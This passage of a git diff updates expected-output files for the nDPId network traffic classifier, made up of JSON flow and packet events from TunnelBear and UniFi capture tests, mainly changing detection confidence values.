CN=*.newrelic.com","alpn":"http\/1.1","fingerprint":"90:B0:56:FB:4D:88:5C:EB:F9:79:45:35:26:15:0C:00:F4:08:72:77"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734777904,"flow_last_seen":1655734777904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734777904,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33858,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1655734777904,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734777904,"pkt":"ABoRAAACABoRAAABCABFAAA8VQtAAEAGAW8KCAABaBFyKIRCAbtalsosAAAAAKAC\/\/8YcQAAAgQFtAQCCAoBZJ8nAAAAAAEDAwg="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1655734777909,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734777909,"pkt":"ABoRAAACABoRAAABCABFAAAoALVAABAGhdloEXIoCggAAQG7hEKlaTXTWpbKLVAS\/\/9FkgAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1655734777910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734777910,"pkt":"ABoRAAACABoRAAABCABFAAAoVQxAAEAGAYIKCAABaBFyKIRCAbtalsotpWk11FAQ\/\/9FkwAA"} 
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734777904,"flow_last_seen":1655734777912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734777912,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00948{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655734764418,"flow_last_seen":1655734764869,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":1831,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.200.188","src_port":47046,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1655734776512,"flow_last_seen":1655734777353,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5473,"flow_tot_l4_payload_len":8586,"flow_avg_l4_payload_len":429,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.154.236","src_port":50904,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1655734524480,"flow_last_seen":1655734524990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3864,"flow_tot_l4_payload_len":5884,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"162.247.243.188","src_port":47496,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1655734755247,"flow_last_seen":1655734756001,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2760,"flow_tot_l4_payload_len":4271,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"157.240.7.32","src_port":60224,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": 
{"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1655734776705,"flow_last_seen":1655734778245,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3864,"flow_tot_l4_payload_len":5977,"flow_avg_l4_payload_len":351,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"162.247.243.188","src_port":48222,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00748{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1655734754648,"flow_last_seen":1655734754651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.158.132.91","dst_ip":"8.8.8.8","src_port":51120,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1655734754648,"flow_last_seen":1655734754651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.158.132.91","dst_ip":"8.8.8.8","src_port":51120,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1655734759670,"flow_last_seen":1655734762085,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4026,"flow_tot_l4_payload_len":7794,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"99.83.135.170","src_port":47594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1655734754614,"flow_last_seen":1655734755078,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":1551,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.158.132.91","dst_ip":"104.17.114.40","src_port":38398,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1655734524312,"flow_last_seen":1655734524991,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5473,"flow_tot_l4_payload_len":8613,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.154.236","src_port":50178,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1655734776460,"flow_last_seen":1655734777910,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2900,"flow_tot_l4_payload_len":10971,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33830,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} 
+00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655734776516,"flow_last_seen":1655734776970,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33838,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655734776520,"flow_last_seen":1655734776969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1655734776527,"flow_last_seen":1655734776901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":894,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655734776538,"flow_last_seen":1655734776971,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33848,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1655734777904,"flow_last_seen":1655734777912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33858,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","packets-captured":421,"packets-processed":421,"total-skipped-flows":0,"total-l4-payload-len":92077,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":20,"total-detection-updates":19,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":148,"global_ts_msec":1655734778245} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets 
captured/processed: 421/421 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 92077 bytes +~~ total detected protocols..: 20 +~~ total active/idle flows...: 21/21 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6120691 bytes +~~ total memory freed........: 6120691 bytes +~~ total allocations/frees...: 121465/121465 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 458 chars +~~ json string max len.......: 1259 chars +~~ json string avg len.......: 858 chars diff --git a/test/results/ubntac2.pcap.out b/test/results/ubntac2.pcap.out index ef73410dd..a86f877e1 100644 --- a/test/results/ubntac2.pcap.out +++ b/test/results/ubntac2.pcap.out 
@@ -2,36 +2,36 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ubntac2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1486943433175} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943433175,"flow_last_seen":1486943433175,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943433175,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":34085,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1486943433175,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1486943433175,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4FAAEARuPfAqAEB\/\/\/\/\/4UlJxEAtx2vAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADeYAsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFc8bAAU0LjAuMA=="} 
-00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943433175,"flow_last_seen":1486943433175,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943433175,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":34085,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943433175,"flow_last_seen":1486943433175,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943433175,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":34085,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943443357,"flow_last_seen":1486943443357,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943443357,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":44641,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1486943443357,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1486943443357,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4JAAEARuPbAqAEB\/\/\/\/\/65hJxEAt\/NoAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADeagsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdAbAAU0LjAuMA=="} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943443357,"flow_last_seen":1486943443357,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943443357,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":44641,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943443357,"flow_last_seen":1486943443357,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943443357,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":44641,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943453510,"flow_last_seen":1486943453510,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943453510,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":55321,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1486943453510,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1486943453510,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4NAAEARuPXAqAEB\/\/\/\/\/9gZJxEAt8imAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADedAsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdEbAAU0LjAuMA=="} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943453510,"flow_last_seen":1486943453510,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943453510,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":55321,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943453510,"flow_last_seen":1486943453510,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943453510,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":55321,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943463665,"flow_last_seen":1486943463665,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943463665,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47871,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1486943463665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1486943463665,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4RAAEARuPTAqAEB\/\/\/\/\/7r\/JxEAt+S2AgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADefgsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdIbAAU0LjAuMA=="} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943463665,"flow_last_seen":1486943463665,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943463665,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47871,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943463665,"flow_last_seen":1486943463665,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943463665,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47871,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": 
